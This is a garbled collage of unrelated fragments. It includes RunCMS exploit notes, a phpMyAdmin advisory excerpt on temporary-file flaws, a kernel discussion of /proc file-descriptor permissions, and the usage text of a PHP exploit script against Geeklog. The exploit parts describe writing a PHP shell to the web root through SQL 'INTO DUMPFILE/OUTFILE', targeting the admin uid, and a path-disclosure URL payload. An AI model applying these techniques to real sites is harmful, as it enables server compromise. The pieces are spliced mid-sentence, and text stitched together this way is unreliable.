- an existing row in [prefix]_forum_forum_access table
which is very possible against a runcms installation with a working and active forum.
Also, you could manipulate the query in post.php to export a php shell through
'INTO DUMPFILE' method, but you need FILE privilege and magic_quotes_gpc = off.
It's also possible to disclose absolute path in certain conditions (see error_reporting)
by polluting a preg_match() argument:
http://[host]/[path_to_runcms]/modules/contact/index.php?op[]=1
project identifies the following problems:
CVE-2008-7251
phpMyAdmin may create a temporary directory, if the configured directory
does not exist yet, with insecure filesystem permissions.
CVE-2008-7252
phpMyAdmin uses predictable filenames for temporary files, which may
lead to a local denial of service attack or privilege escalation.
resources, a check should be done to see what it allows. The check for the
inode permissions are more questionable. As can be seen above, using a fd
directly ignores file permissions and only uses fd "permissions". Accessing
via /proc is like accessing via fd so there is an argument to be had for
keeping semantics the same (then again, there's an argument to be had
for listening to file system permissions since that's also the context it's
in).
The directory permissions are irrelevant in the case of access via fd
without the use of /proc. The directory permissions only control 3 things:
}
}
function syntax() {
print (
"Syntax: php ".$argv[0]." [host] [path] [OPTIONS] \n". "Options: \n". "--port:[port] - specify a port \n". " default->80 \n". "--prefix - try to extract table prefix from information.schema \n". " default->gl_ \n". "--uid:[n] - specify an uid other than default (2,usually admin) \n". "--proxy:[host:port] - use proxy \n". "--skiptest - skip preliminary tests \n". "--test - run only tests \n". "--export_shell:[path] - try to export a shell with INTO OUTFILE, needs Mysql\n". " FILE privilege \n". "--sp -
submit a 'staticpage' with php code, needs geeklog \n". " sp_php permission set to true for thestaticpage \n". " plugin (not the default) \n". "Examples: php ".$argv[0]." 192.168.0.1 /geeklog/ \n". " php ".$argv[0]." 192.168.0.1 / --prefix --proxy:1.1.1.1:8080 \n". " php ".$argv[0]." 192.168.0.1 / --prefix --export_shell:/var/www\n". " php ".$argv[0]." 192.168.0.1 / --prefix --uid:3");
die();
}
error_reporting(E_ALL ^ E_NOTICE);
